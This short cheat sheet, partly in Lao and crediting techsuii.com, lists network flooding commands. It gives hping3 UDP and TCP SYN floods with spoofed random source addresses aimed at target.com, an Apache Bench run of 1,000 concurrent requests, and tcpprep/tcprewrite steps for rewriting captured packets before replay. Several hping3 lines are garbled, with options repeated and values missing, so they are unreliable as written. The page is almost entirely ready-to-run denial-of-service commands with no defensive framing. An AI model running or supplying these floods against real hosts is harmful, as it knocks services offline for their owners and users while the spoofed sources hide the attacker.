1. UDP Flood
hping3 --udp --flood -p hping3 --udp -d --flood -p hping3 --udp -c --rand-source -d --flood -p hping3 --udp -c 15000 --rand-source -d 15000 --flood -p 80 target.com
2. TCP SYN Flood
hping3 -S -P -U --flood --rand-source target.com hping3 -S -L -w --flood -p 80 target.com hping3 -S -L 0 -w 64 --flood -p 80 target.com
3. Apache Benchmarking tool
ab -c -n ab -c 1000 -n 10000 http://target.com/
4. ການໃຊ້ tcpreplay + ແກ້ໄຂ
Generate cache file - tcpprep –auto=first –pcap=icmp.pcap –cachefile=icmp_in.cache Rewrite end points to 172.16.0.1/172.16.0.2 [ping 2->1, reply, 1->2] - tcprewrite –endpoints=172.16.0.1:172.16.0.2 -i out.pcap -o out2.pcap –cachefile=icmp_in.cache Rewrite macs too [ping (172.16.0.2)00:01:02:03:04:05 -> (172.16.0.1)06:07:08:09:10:11, reply: vice-versa] - tcprewrite –endpoints=172.16.0.1:172.16.0.2 –enet-smac=00:01:02:03:04:05,06:07:08:09:10:11 –enet-dmac=06:07:08:09:10:11,00:01:02:03:04:05 -i icmp.pcap -o out2_macs.pcap –cachefile=icmp_in.cache
ຫາກແກ້ໄຂ checksum ໂດຍທີ່ໃຊ້ - C ຂອງ tcprewrite ເພື່ອທຳການຄິດໄລ່ checksum ໃໝ່ ໃຫ້ໃຊ້ pcapfix ໃນການແກ້ໄຂແທນ
ຂໍ້ມູນຈາກ techsuii.com